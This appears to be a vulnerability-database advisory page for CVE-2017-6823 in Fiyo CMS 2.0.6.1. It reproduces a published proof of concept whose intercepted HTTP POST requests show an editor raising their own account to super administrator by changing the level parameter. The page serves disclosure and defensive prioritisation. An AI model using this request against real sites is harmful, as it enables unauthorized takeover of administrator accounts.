CVE-2017-6823
high
CVSS v3
8.8
CVSS v4 NEW
—
VIR risk
9.8
Description
Fiyo CMS 2.0.6.1 allows remote authenticated users to gain privileges via a modified level parameter to dapur/ in an app=user&act=edit action.
Predictions
Exploit likelihood
92%
Patch ETA
—
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.
✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Fiyo CMS 2.0.6.1 - Privilege Escalation
# Exploit Title: Fiyo CMS 2.0.6.1 allows remote authenticated users to gain privileges via a modified level parameter
# Google Dork: no
# Date: 11-03-2017
# Exploit Author: @rungga_reksya, @dvnrcy
# Vendor Homepage: http://www.fiyo.org
# Software Link: https://sourceforge.net/projects/fiyo-cms
# Version: 2.0.6.1
# Tested on: Windows Server 2012 Datacenter Evaluation
# CVE : CVE-2017-6823
I. Background:
Fiyo CMS di kembangkan dan dibuat pertama kali oleh mantan seorang pelajar SMK yang pada saat itu bersekolah di SMK 10 Semarang jurusan RPL. Pada zaman itu namanya bukan Fiyo CMS melainkan Sirion yang merupakan akronim dari Site Administration.
II. Description:
Privilege Escalation (Manipulation of User Group) Vulnerability on Fiyo CMS 2.0.6.1
III. Exploit:
Fiyo CMS have five user group (super administrator, administrator, editor, publisher, member) and only three group can access backend page of admin (super administrator, administrator and editor).
If we login as super administrator and access edit profile menu, check source code (ctrl+u) from your browser and we get level privilege:
super administrator = 1
administrator = 2
editor = 3
publisher = 4
member = 5
Ok, prepare your tool like burpsuite to intercept traffic. in this case I login as editor and I want manipulation of editor group (level=3) to be super administrator group (level=1). The first you access on menu “Edit Profile” and click “Simpan (Save)”, and then change like this on your burpsuite intercept menu:
Original:
POST /fiyo_cms_2.0.6.1/dapur/?app=user&act=edit&id=3 HTTP/1.1
Host: 192.168.1.2
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.2/fiyo_cms_2.0.6.1/dapur/?app=user&act=edit&id=3
Cookie: c40cded1c770e0ead20a6bcbf9a26edf=hplreme8us3iem3jg36km36ob5; PHPSESSID=dcj4n83jd2tdrjs32fo6gm9eq7
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 134
edit=Next&id=3&z=editor&user=editor&z=editor&x=&password=editor&kpassword=editor&email=editor%40localhost.com&level=3&name=editor&bio=
Manipulation (Change Level=3 to be Level=1):
POST /fiyo_cms_2.0.6.1/dapur/?app=user&act=edit&id=3 HTTP/1.1
Host: 192.168.1.2
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.2/fiyo_cms_2.0.6.1/dapur/?app=user&act=edit&id=3
Cookie: c40cded1c770e0ead20a6bcbf9a26edf=hplreme8us3iem3jg36km36ob5; PHPSESSID=dcj4n83jd2tdrjs32fo6gm9eq7
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 134
edit=Next&id=3&z=editor&user=editor&z=editor&x=&password=editor&kpassword=editor&email=editor%40localhost.com&level=1&name=editor&bio=
Yeaaah, now editor become super administrator privilege ^_^ and The level of administrator can be super administrator too.
IV. Thanks to:
- Alloh SWT
- MyBoboboy
- MII CAS
- Komunitas IT Auditor & IT Security Kaskus
Refer:
https://www.owasp.org/index.php/Testing_for_Privilege_escalation_(OTG-AUTHZ-003)Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| fiyo | fiyo_cms | 2.0.6.1 | |
References
- http://rungga.blogspot.co.id/2017/03/privilege-escalation-manipulation-of.html
- http://www.securityfocus.com/bid/96889
- https://www.exploit-db.com/exploits/41594/
- http://rungga.blogspot.co.id/2017/03/privilege-escalation-manipulation-of.html
- http://www.securityfocus.com/bid/96889
- https://www.exploit-db.com/exploits/41594/
CWEs
CWE-294
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.